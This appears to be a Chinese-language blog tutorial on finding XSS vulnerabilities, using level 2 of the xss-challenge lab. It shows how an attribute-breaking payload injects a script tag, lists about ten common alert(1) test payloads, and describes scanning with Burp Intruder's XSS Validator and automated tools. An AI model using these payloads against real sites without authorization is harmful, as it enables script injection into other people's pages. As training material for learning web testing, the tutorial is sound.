xss漏洞挖掘

xss漏洞挖掘

以xss-challenge第二关为例

image-20231120192652282

输入123

查看网页源代码

image-20231120192724746

发现value值原样返回

手动挖掘

此处发现尖括号和双引号闭合完整,因此可以直接使用<script>alert(/xss/)</script>测试

发现提交过后标签内容被双引号闭合进去了

image-20231120193409728

因此此处需要将标签脱离出来,观察可以发现使用“>即可将input标签闭合,随后写进去的<script>标签内容就可以被实现了

"><script>alert(/xss/)</script>

image-20231120193603570

当然此处可以使用hackbar,因为hackbar有编解码功能,有些题目会需要编码绕过

如果有些过滤符号的,即可考虑使用伪协议绕过,详情可以参考xsschallenge后续关卡

常见的手工文本如下

<script>alert(1)</script>
"><script>alert(1)</script>
<img/src=@ alert(1)/>
"><img/src=@ alert(1)/>
'alert(1)x='
"alert(1)x="
javascript:alert(1)//
";alert(1)//
</script><script>alert(1)//
alert(1)//

工具

也可使用bp等相关工具

bp需要在这里先安装xss validator

image-20231120195806043

image-20231120200101477

bp抓包查看

image-20231120194046958

发送给intruder然后标记keyword的值

注意要选择如图payload

image-20231120195931067

image-20231120200340810

image-20231120200556505

相应包中,只要script标签是独立出来的就是成功的执行

正常来说,它应该会把成功的打勾,这里不知道为啥没有

image-20231120202054479

自动

有诸多工具

awvs
APPscan
burp
xsser
OWASP Xenotix
g-N8IUvxlo-1700483007810)]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值